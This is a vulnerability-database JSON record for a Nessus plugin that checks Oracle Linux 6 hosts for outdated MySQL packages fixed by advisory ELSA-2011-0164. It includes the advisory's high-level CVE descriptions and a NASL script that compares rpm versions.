{"id": "ORACLELINUX_ELSA-2011-0164.NASL", "bulletinFamily": "scanner", "title": "Oracle Linux 6 : mysql (ELSA-2011-0164)", "description": "From Red Hat Security Advisory 2011:0164 :\n\nUpdated mysql packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nMySQL is a multi-user, multi-threaded SQL database server. It consists\nof the MySQL server daemon (mysqld) and many client programs and\nlibraries.\n\nThe MySQL PolyFromWKB() function did not sanity check Well-Known\nBinary (WKB) data, which could allow a remote, authenticated attacker\nto crash mysqld. (CVE-2010-3840)\n\nA flaw in the way MySQL processed certain JOIN queries could allow a\nremote, authenticated attacker to cause excessive CPU use (up to\n100%), if a stored procedure contained JOIN queries, and that\nprocedure was executed twice in sequence. (CVE-2010-3839)\n\nA flaw in the way MySQL processed queries that provide a mixture of\nnumeric and longblob data types to the LEAST or GREATEST function,\ncould allow a remote, authenticated attacker to crash mysqld.\n(CVE-2010-3838)\n\nA flaw in the way MySQL processed PREPARE statements containing both\nGROUP_CONCAT and the WITH ROLLUP modifier could allow a remote,\nauthenticated attacker to crash mysqld. (CVE-2010-3837)\n\nMySQL did not properly pre-evaluate LIKE arguments in view prepare\nmode, possibly allowing a remote, authenticated attacker to crash\nmysqld. (CVE-2010-3836)\n\nA flaw in the way MySQL processed statements that assign a value to a\nuser-defined variable and that also contain a logical value evaluation\ncould allow a remote, authenticated attacker to crash mysqld.\n(CVE-2010-3835)\n\nA flaw in the way MySQL evaluated the arguments of extreme-value\nfunctions, such as LEAST and GREATEST, could allow a remote,\nauthenticated attacker to crash mysqld. (CVE-2010-3833)\n\nA flaw in the way MySQL handled LOAD DATA INFILE requests allowed\nMySQL to send OK packets even when there were errors. (CVE-2010-3683)\n\nA flaw in the way MySQL processed EXPLAIN statements for some complex\nSELECT queries could allow a remote, authenticated attacker to crash\nmysqld. (CVE-2010-3682)\n\nA flaw in the way MySQL processed certain alternating READ requests\nprovided by HANDLER statements could allow a remote, authenticated\nattacker to crash mysqld. (CVE-2010-3681)\n\nA flaw in the way MySQL processed CREATE TEMPORARY TABLE statements\nthat define NULL columns when using the InnoDB storage engine, could\nallow a remote, authenticated attacker to crash mysqld.\n(CVE-2010-3680)\n\nA flaw in the way MySQL processed certain values provided to the\nBINLOG statement caused MySQL to read unassigned memory. A remote,\nauthenticated attacker could possibly use this flaw to crash mysqld.\n(CVE-2010-3679)\n\nA flaw in the way MySQL processed SQL queries containing IN or CASE\nstatements, when a NULL argument was provided as one of the arguments\nto the query, could allow a remote, authenticated attacker to crash\nmysqld. (CVE-2010-3678)\n\nA flaw in the way MySQL processed JOIN queries that attempt to\nretrieve data from a unique SET column could allow a remote,\nauthenticated attacker to crash mysqld. (CVE-2010-3677)\n\nNote: CVE-2010-3840, CVE-2010-3838, CVE-2010-3837, CVE-2010-3835,\nCVE-2010-3833, CVE-2010-3682, CVE-2010-3681, CVE-2010-3680,\nCVE-2010-3678, and CVE-2010-3677 only cause a temporary denial of\nservice, as mysqld was automatically restarted after each crash.\n\nThese updated packages upgrade MySQL to version 5.1.52. Refer to the\nMySQL release notes for a full list of changes :\n\nhttp://dev.mysql.com/doc/refman/5.1/en/news-5-1-52.html\n\nAll MySQL users should upgrade to these updated packages, which\ncorrect these issues. After installing this update, the MySQL server\ndaemon (mysqld) will be restarted automatically.", "published": "2013-07-12T00:00:00", "modified": "2019-01-02T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=68184", "reporter": "Tenable", "references": ["https://oss.oracle.com/pipermail/el-errata/2011-February/001871.html"], "cvelist": ["CVE-2010-3837", "CVE-2010-3680", "CVE-2010-3678", "CVE-2010-3839", "CVE-2010-3835", "CVE-2010-3681", "CVE-2010-3833", "CVE-2010-3840", "CVE-2010-3682", "CVE-2010-3679", "CVE-2010-3836", "CVE-2010-3683", "CVE-2010-3677", "CVE-2010-3838"], "type": "nessus", "lastseen": "2019-01-16T20:16:41", "history": [{"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:oracle:linux:6", "p-cpe:/a:oracle:linux:mysql", "p-cpe:/a:oracle:linux:mysql-devel", "p-cpe:/a:oracle:linux:mysql-embedded", "p-cpe:/a:oracle:linux:mysql-libs", "p-cpe:/a:oracle:linux:mysql-bench", "p-cpe:/a:oracle:linux:mysql-test", "p-cpe:/a:oracle:linux:mysql-embedded-devel", "p-cpe:/a:oracle:linux:mysql-server"], "cvelist": ["CVE-2010-3837", "CVE-2010-3680", "CVE-2010-3678", "CVE-2010-3839", "CVE-2010-3835", "CVE-2010-3681", "CVE-2010-3833", "CVE-2010-3840", "CVE-2010-3682", "CVE-2010-3679", "CVE-2010-3836", "CVE-2010-3683", "CVE-2010-3677", "CVE-2010-3838"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "From Red Hat Security Advisory 2011:0164 :\n\nUpdated mysql packages that fix multiple security issues are now available for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nMySQL is a multi-user, multi-threaded SQL database server. It consists of the MySQL server daemon (mysqld) and many client programs and libraries.\n\nThe MySQL PolyFromWKB() function did not sanity check Well-Known Binary (WKB) data, which could allow a remote, authenticated attacker to crash mysqld. (CVE-2010-3840)\n\nA flaw in the way MySQL processed certain JOIN queries could allow a remote, authenticated attacker to cause excessive CPU use (up to 100%), if a stored procedure contained JOIN queries, and that procedure was executed twice in sequence. (CVE-2010-3839)\n\nA flaw in the way MySQL processed queries that provide a mixture of numeric and longblob data types to the LEAST or GREATEST function, could allow a remote, authenticated attacker to crash mysqld.\n(CVE-2010-3838)\n\nA flaw in the way MySQL processed PREPARE statements containing both GROUP_CONCAT and the WITH ROLLUP modifier could allow a remote, authenticated attacker to crash mysqld. (CVE-2010-3837)\n\nMySQL did not properly pre-evaluate LIKE arguments in view prepare mode, possibly allowing a remote, authenticated attacker to crash mysqld. (CVE-2010-3836)\n\nA flaw in the way MySQL processed statements that assign a value to a user-defined variable and that also contain a logical value evaluation could allow a remote, authenticated attacker to crash mysqld.\n(CVE-2010-3835)\n\nA flaw in the way MySQL evaluated the arguments of extreme-value functions, such as LEAST and GREATEST, could allow a remote, authenticated attacker to crash mysqld. (CVE-2010-3833)\n\nA flaw in the way MySQL handled LOAD DATA INFILE requests allowed MySQL to send OK packets even when there were errors. (CVE-2010-3683)\n\nA flaw in the way MySQL processed EXPLAIN statements for some complex SELECT queries could allow a remote, authenticated attacker to crash mysqld. (CVE-2010-3682)\n\nA flaw in the way MySQL processed certain alternating READ requests provided by HANDLER statements could allow a remote, authenticated attacker to crash mysqld. (CVE-2010-3681)\n\nA flaw in the way MySQL processed CREATE TEMPORARY TABLE statements that define NULL columns when using the InnoDB storage engine, could allow a remote, authenticated attacker to crash mysqld.\n(CVE-2010-3680)\n\nA flaw in the way MySQL processed certain values provided to the BINLOG statement caused MySQL to read unassigned memory. A remote, authenticated attacker could possibly use this flaw to crash mysqld.\n(CVE-2010-3679)\n\nA flaw in the way MySQL processed SQL queries containing IN or CASE statements, when a NULL argument was provided as one of the arguments to the query, could allow a remote, authenticated attacker to crash mysqld. (CVE-2010-3678)\n\nA flaw in the way MySQL processed JOIN queries that attempt to retrieve data from a unique SET column could allow a remote, authenticated attacker to crash mysqld. (CVE-2010-3677)\n\nNote: CVE-2010-3840, CVE-2010-3838, CVE-2010-3837, CVE-2010-3835, CVE-2010-3833, CVE-2010-3682, CVE-2010-3681, CVE-2010-3680, CVE-2010-3678, and CVE-2010-3677 only cause a temporary denial of service, as mysqld was automatically restarted after each crash.\n\nThese updated packages upgrade MySQL to version 5.1.52. Refer to the MySQL release notes for a full list of changes :\n\nhttp://dev.mysql.com/doc/refman/5.1/en/news-5-1-52.html\n\nAll MySQL users should upgrade to these updated packages, which correct these issues. After installing this update, the MySQL server daemon (mysqld) will be restarted automatically.", "edition": 3, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "hash": "b6e5f79057175273b5ddd6f9cd300b92785bed399bcdcd5f8048f110269dcde1", "hashmap": [{"hash": "3c5afcca913658450e43fe2cc0af5e77", "key": "description"}, {"hash": "8754a4c79639fe9e72913f51a467720c", "key": "references"}, {"hash": "52a589bac1c2c4d1b20742a5e936a6a0", "key": "cpe"}, {"hash": "28a94886eaa4ff2b55031e0322ec393e", "key": "cvelist"}, {"hash": "4579da10f367382f6c82a034cac778ad", "key": "pluginID"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "44a7c372e4fd70f63bab3c202bc2425d", "key": "title"}, {"hash": "e31ed89ab0cbb68ce2c40f17ec1e5483", "key": "naslFamily"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "0db193a0effe2d65dffecdb5e4d9c241", "key": "published"}, {"hash": "01747313503f2ddd0055183b17255a2e", "key": "href"}, {"hash": "952a2e8fc7d51d5cdf3746dd935403dd", "key": "sourceData"}, {"hash": "62f567f562bbeddeaf1e6db6eec3283c", "key": "modified"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=68184", "id": "ORACLELINUX_ELSA-2011-0164.NASL", "lastseen": "2018-08-30T19:56:40", "modified": "2016-05-06T00:00:00", "naslFamily": "Oracle Linux Local Security Checks", "objectVersion": "1.3", "pluginID": "68184", "published": "2013-07-12T00:00:00", "references": ["https://oss.oracle.com/pipermail/el-errata/2011-February/001871.html"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2011:0164 and \n# Oracle Linux Security Advisory ELSA-2011-0164 respectively.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(68184);\n script_version(\"$Revision: 1.4 $\");\n script_cvs_date(\"$Date: 2016/05/06 16:53:48 $\");\n\n script_cve_id(\"CVE-2010-3677\", \"CVE-2010-3678\", \"CVE-2010-3679\", \"CVE-2010-3680\", \"CVE-2010-3681\", \"CVE-2010-3682\", \"CVE-2010-3683\", \"CVE-2010-3833\", \"CVE-2010-3835\", \"CVE-2010-3836\", \"CVE-2010-3837\", \"CVE-2010-3838\", \"CVE-2010-3839\", \"CVE-2010-3840\");\n script_bugtraq_id(42596, 42598, 42599, 42625, 42633, 42638, 42646, 43676);\n script_xref(name:\"RHSA\", value:\"2011:0164\");\n\n script_name(english:\"Oracle Linux 6 : mysql (ELSA-2011-0164)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2011:0164 :\n\nUpdated mysql packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nMySQL is a multi-user, multi-threaded SQL database server. It consists\nof the MySQL server daemon (mysqld) and many client programs and\nlibraries.\n\nThe MySQL PolyFromWKB() function did not sanity check Well-Known\nBinary (WKB) data, which could allow a remote, authenticated attacker\nto crash mysqld. (CVE-2010-3840)\n\nA flaw in the way MySQL processed certain JOIN queries could allow a\nremote, authenticated attacker to cause excessive CPU use (up to\n100%), if a stored procedure contained JOIN queries, and that\nprocedure was executed twice in sequence. (CVE-2010-3839)\n\nA flaw in the way MySQL processed queries that provide a mixture of\nnumeric and longblob data types to the LEAST or GREATEST function,\ncould allow a remote, authenticated attacker to crash mysqld.\n(CVE-2010-3838)\n\nA flaw in the way MySQL processed PREPARE statements containing both\nGROUP_CONCAT and the WITH ROLLUP modifier could allow a remote,\nauthenticated attacker to crash mysqld. (CVE-2010-3837)\n\nMySQL did not properly pre-evaluate LIKE arguments in view prepare\nmode, possibly allowing a remote, authenticated attacker to crash\nmysqld. (CVE-2010-3836)\n\nA flaw in the way MySQL processed statements that assign a value to a\nuser-defined variable and that also contain a logical value evaluation\ncould allow a remote, authenticated attacker to crash mysqld.\n(CVE-2010-3835)\n\nA flaw in the way MySQL evaluated the arguments of extreme-value\nfunctions, such as LEAST and GREATEST, could allow a remote,\nauthenticated attacker to crash mysqld. (CVE-2010-3833)\n\nA flaw in the way MySQL handled LOAD DATA INFILE requests allowed\nMySQL to send OK packets even when there were errors. (CVE-2010-3683)\n\nA flaw in the way MySQL processed EXPLAIN statements for some complex\nSELECT queries could allow a remote, authenticated attacker to crash\nmysqld. (CVE-2010-3682)\n\nA flaw in the way MySQL processed certain alternating READ requests\nprovided by HANDLER statements could allow a remote, authenticated\nattacker to crash mysqld. (CVE-2010-3681)\n\nA flaw in the way MySQL processed CREATE TEMPORARY TABLE statements\nthat define NULL columns when using the InnoDB storage engine, could\nallow a remote, authenticated attacker to crash mysqld.\n(CVE-2010-3680)\n\nA flaw in the way MySQL processed certain values provided to the\nBINLOG statement caused MySQL to read unassigned memory. A remote,\nauthenticated attacker could possibly use this flaw to crash mysqld.\n(CVE-2010-3679)\n\nA flaw in the way MySQL processed SQL queries containing IN or CASE\nstatements, when a NULL argument was provided as one of the arguments\nto the query, could allow a remote, authenticated attacker to crash\nmysqld. (CVE-2010-3678)\n\nA flaw in the way MySQL processed JOIN queries that attempt to\nretrieve data from a unique SET column could allow a remote,\nauthenticated attacker to crash mysqld. (CVE-2010-3677)\n\nNote: CVE-2010-3840, CVE-2010-3838, CVE-2010-3837, CVE-2010-3835,\nCVE-2010-3833, CVE-2010-3682, CVE-2010-3681, CVE-2010-3680,\nCVE-2010-3678, and CVE-2010-3677 only cause a temporary denial of\nservice, as mysqld was automatically restarted after each crash.\n\nThese updated packages upgrade MySQL to version 5.1.52. Refer to the\nMySQL release notes for a full list of changes :\n\nhttp://dev.mysql.com/doc/refman/5.1/en/news-5-1-52.html\n\nAll MySQL users should upgrade to these updated packages, which\ncorrect these issues. After installing this update, the MySQL server\ndaemon (mysqld) will be restarted automatically.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2011-February/001871.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected mysql packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mysql-bench\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mysql-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mysql-embedded\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mysql-embedded-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mysql-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mysql-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mysql-test\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/02/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2016 Tenable Network Security, Inc.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", reference:\"mysql-5.1.52-1.el6_0.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"mysql-bench-5.1.52-1.el6_0.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"mysql-devel-5.1.52-1.el6_0.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"mysql-embedded-5.1.52-1.el6_0.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"mysql-embedded-devel-5.1.52-1.el6_0.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"mysql-libs-5.1.52-1.el6_0.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"mysql-server-5.1.52-1.el6_0.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"mysql-test-5.1.52-1.el6_0.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mysql / mysql-bench / mysql-devel / mysql-embedded / etc\");\n}\n", "title": "Oracle Linux 6 : mysql (ELSA-2011-0164)", "type": "nessus", "viewCount": 0}, "differentElements": ["cvss"], "edition": 3, "lastseen": "2018-08-30T19:56:40"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:oracle:linux:6", "p-cpe:/a:oracle:linux:mysql", "p-cpe:/a:oracle:linux:mysql-devel", "p-cpe:/a:oracle:linux:mysql-embedded", "p-cpe:/a:oracle:linux:mysql-libs", "p-cpe:/a:oracle:linux:mysql-bench", "p-cpe:/a:oracle:linux:mysql-test", "p-cpe:/a:oracle:linux:mysql-embedded-devel", "p-cpe:/a:oracle:linux:mysql-server"], "cvelist": ["CVE-2010-3837", "CVE-2010-3680", "CVE-2010-3678", "CVE-2010-3839", "CVE-2010-3835", "CVE-2010-3681", "CVE-2010-3833", "CVE-2010-3840", "CVE-2010-3682", "CVE-2010-3679", "CVE-2010-3836", "CVE-2010-3683", "CVE-2010-3677", "CVE-2010-3838"], "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "description": "From Red Hat Security Advisory 2011:0164 :\n\nUpdated mysql packages that fix multiple security issues are now available for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nMySQL is a multi-user, multi-threaded SQL database server. It consists of the MySQL server daemon (mysqld) and many client programs and libraries.\n\nThe MySQL PolyFromWKB() function did not sanity check Well-Known Binary (WKB) data, which could allow a remote, authenticated attacker to crash mysqld. (CVE-2010-3840)\n\nA flaw in the way MySQL processed certain JOIN queries could allow a remote, authenticated attacker to cause excessive CPU use (up to 100%), if a stored procedure contained JOIN queries, and that procedure was executed twice in sequence. (CVE-2010-3839)\n\nA flaw in the way MySQL processed queries that provide a mixture of numeric and longblob data types to the LEAST or GREATEST function, could allow a remote, authenticated attacker to crash mysqld.\n(CVE-2010-3838)\n\nA flaw in the way MySQL processed PREPARE statements containing both GROUP_CONCAT and the WITH ROLLUP modifier could allow a remote, authenticated attacker to crash mysqld. (CVE-2010-3837)\n\nMySQL did not properly pre-evaluate LIKE arguments in view prepare mode, possibly allowing a remote, authenticated attacker to crash mysqld. (CVE-2010-3836)\n\nA flaw in the way MySQL processed statements that assign a value to a user-defined variable and that also contain a logical value evaluation could allow a remote, authenticated attacker to crash mysqld.\n(CVE-2010-3835)\n\nA flaw in the way MySQL evaluated the arguments of extreme-value functions, such as LEAST and GREATEST, could allow a remote, authenticated attacker to crash mysqld. (CVE-2010-3833)\n\nA flaw in the way MySQL handled LOAD DATA INFILE requests allowed MySQL to send OK packets even when there were errors. (CVE-2010-3683)\n\nA flaw in the way MySQL processed EXPLAIN statements for some complex SELECT queries could allow a remote, authenticated attacker to crash mysqld. (CVE-2010-3682)\n\nA flaw in the way MySQL processed certain alternating READ requests provided by HANDLER statements could allow a remote, authenticated attacker to crash mysqld. (CVE-2010-3681)\n\nA flaw in the way MySQL processed CREATE TEMPORARY TABLE statements that define NULL columns when using the InnoDB storage engine, could allow a remote, authenticated attacker to crash mysqld.\n(CVE-2010-3680)\n\nA flaw in the way MySQL processed certain values provided to the BINLOG statement caused MySQL to read unassigned memory. A remote, authenticated attacker could possibly use this flaw to crash mysqld.\n(CVE-2010-3679)\n\nA flaw in the way MySQL processed SQL queries containing IN or CASE statements, when a NULL argument was provided as one of the arguments to the query, could allow a remote, authenticated attacker to crash mysqld. (CVE-2010-3678)\n\nA flaw in the way MySQL processed JOIN queries that attempt to retrieve data from a unique SET column could allow a remote, authenticated attacker to crash mysqld. (CVE-2010-3677)\n\nNote: CVE-2010-3840, CVE-2010-3838, CVE-2010-3837, CVE-2010-3835, CVE-2010-3833, CVE-2010-3682, CVE-2010-3681, CVE-2010-3680, CVE-2010-3678, and CVE-2010-3677 only cause a temporary denial of service, as mysqld was automatically restarted after each crash.\n\nThese updated packages upgrade MySQL to version 5.1.52. Refer to the MySQL release notes for a full list of changes :\n\nhttp://dev.mysql.com/doc/refman/5.1/en/news-5-1-52.html\n\nAll MySQL users should upgrade to these updated packages, which correct these issues. After installing this update, the MySQL server daemon (mysqld) will be restarted automatically.", "edition": 4, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "hash": "f7ca52a4290fed3c389fcebecdbd9d057d7dec224cd7c50181fcafd74711b5f4", "hashmap": [{"hash": "3c5afcca913658450e43fe2cc0af5e77", "key": "description"}, {"hash": "8754a4c79639fe9e72913f51a467720c", "key": "references"}, {"hash": "52a589bac1c2c4d1b20742a5e936a6a0", "key": "cpe"}, {"hash": "28a94886eaa4ff2b55031e0322ec393e", "key": "cvelist"}, {"hash": "4579da10f367382f6c82a034cac778ad", "key": "pluginID"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "44a7c372e4fd70f63bab3c202bc2425d", "key": "title"}, {"hash": "e31ed89ab0cbb68ce2c40f17ec1e5483", "key": "naslFamily"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "0db193a0effe2d65dffecdb5e4d9c241", "key": "published"}, {"hash": "01747313503f2ddd0055183b17255a2e", "key": "href"}, {"hash": "84813b1457b92d6ba1174abffbb83a2f", "key": "cvss"}, {"hash": "952a2e8fc7d51d5cdf3746dd935403dd", "key": "sourceData"}, {"hash": "62f567f562bbeddeaf1e6db6eec3283c", "key": "modified"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=68184", "id": "ORACLELINUX_ELSA-2011-0164.NASL", "lastseen": "2018-09-02T00:08:01", "modified": "2016-05-06T00:00:00", "naslFamily": "Oracle Linux Local Security Checks", "objectVersion": "1.3", "pluginID": "68184", "published": "2013-07-12T00:00:00", "references": ["https://oss.oracle.com/pipermail/el-errata/2011-February/001871.html"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2011:0164 and \n# Oracle Linux Security Advisory ELSA-2011-0164 respectively.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(68184);\n script_version(\"$Revision: 1.4 $\");\n script_cvs_date(\"$Date: 2016/05/06 16:53:48 $\");\n\n script_cve_id(\"CVE-2010-3677\", \"CVE-2010-3678\", \"CVE-2010-3679\", \"CVE-2010-3680\", \"CVE-2010-3681\", \"CVE-2010-3682\", \"CVE-2010-3683\", \"CVE-2010-3833\", \"CVE-2010-3835\", \"CVE-2010-3836\", \"CVE-2010-3837\", \"CVE-2010-3838\", \"CVE-2010-3839\", \"CVE-2010-3840\");\n script_bugtraq_id(42596, 42598, 42599, 42625, 42633, 42638, 42646, 43676);\n script_xref(name:\"RHSA\", value:\"2011:0164\");\n\n script_name(english:\"Oracle Linux 6 : mysql (ELSA-2011-0164)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2011:0164 :\n\nUpdated mysql packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nMySQL is a multi-user, multi-threaded SQL database server. It consists\nof the MySQL server daemon (mysqld) and many client programs and\nlibraries.\n\nThe MySQL PolyFromWKB() function did not sanity check Well-Known\nBinary (WKB) data, which could allow a remote, authenticated attacker\nto crash mysqld. (CVE-2010-3840)\n\nA flaw in the way MySQL processed certain JOIN queries could allow a\nremote, authenticated attacker to cause excessive CPU use (up to\n100%), if a stored procedure contained JOIN queries, and that\nprocedure was executed twice in sequence. (CVE-2010-3839)\n\nA flaw in the way MySQL processed queries that provide a mixture of\nnumeric and longblob data types to the LEAST or GREATEST function,\ncould allow a remote, authenticated attacker to crash mysqld.\n(CVE-2010-3838)\n\nA flaw in the way MySQL processed PREPARE statements containing both\nGROUP_CONCAT and the WITH ROLLUP modifier could allow a remote,\nauthenticated attacker to crash mysqld. (CVE-2010-3837)\n\nMySQL did not properly pre-evaluate LIKE arguments in view prepare\nmode, possibly allowing a remote, authenticated attacker to crash\nmysqld. (CVE-2010-3836)\n\nA flaw in the way MySQL processed statements that assign a value to a\nuser-defined variable and that also contain a logical value evaluation\ncould allow a remote, authenticated attacker to crash mysqld.\n(CVE-2010-3835)\n\nA flaw in the way MySQL evaluated the arguments of extreme-value\nfunctions, such as LEAST and GREATEST, could allow a remote,\nauthenticated attacker to crash mysqld. (CVE-2010-3833)\n\nA flaw in the way MySQL handled LOAD DATA INFILE requests allowed\nMySQL to send OK packets even when there were errors. (CVE-2010-3683)\n\nA flaw in the way MySQL processed EXPLAIN statements for some complex\nSELECT queries could allow a remote, authenticated attacker to crash\nmysqld. (CVE-2010-3682)\n\nA flaw in the way MySQL processed certain alternating READ requests\nprovided by HANDLER statements could allow a remote, authenticated\nattacker to crash mysqld. (CVE-2010-3681)\n\nA flaw in the way MySQL processed CREATE TEMPORARY TABLE statements\nthat define NULL columns when using the InnoDB storage engine, could\nallow a remote, authenticated attacker to crash mysqld.\n(CVE-2010-3680)\n\nA flaw in the way MySQL processed certain values provided to the\nBINLOG statement caused MySQL to read unassigned memory. A remote,\nauthenticated attacker could possibly use this flaw to crash mysqld.\n(CVE-2010-3679)\n\nA flaw in the way MySQL processed SQL queries containing IN or CASE\nstatements, when a NULL argument was provided as one of the arguments\nto the query, could allow a remote, authenticated attacker to crash\nmysqld. (CVE-2010-3678)\n\nA flaw in the way MySQL processed JOIN queries that attempt to\nretrieve data from a unique SET column could allow a remote,\nauthenticated attacker to crash mysqld. (CVE-2010-3677)\n\nNote: CVE-2010-3840, CVE-2010-3838, CVE-2010-3837, CVE-2010-3835,\nCVE-2010-3833, CVE-2010-3682, CVE-2010-3681, CVE-2010-3680,\nCVE-2010-3678, and CVE-2010-3677 only cause a temporary denial of\nservice, as mysqld was automatically restarted after each crash.\n\nThese updated packages upgrade MySQL to version 5.1.52. Refer to the\nMySQL release notes for a full list of changes 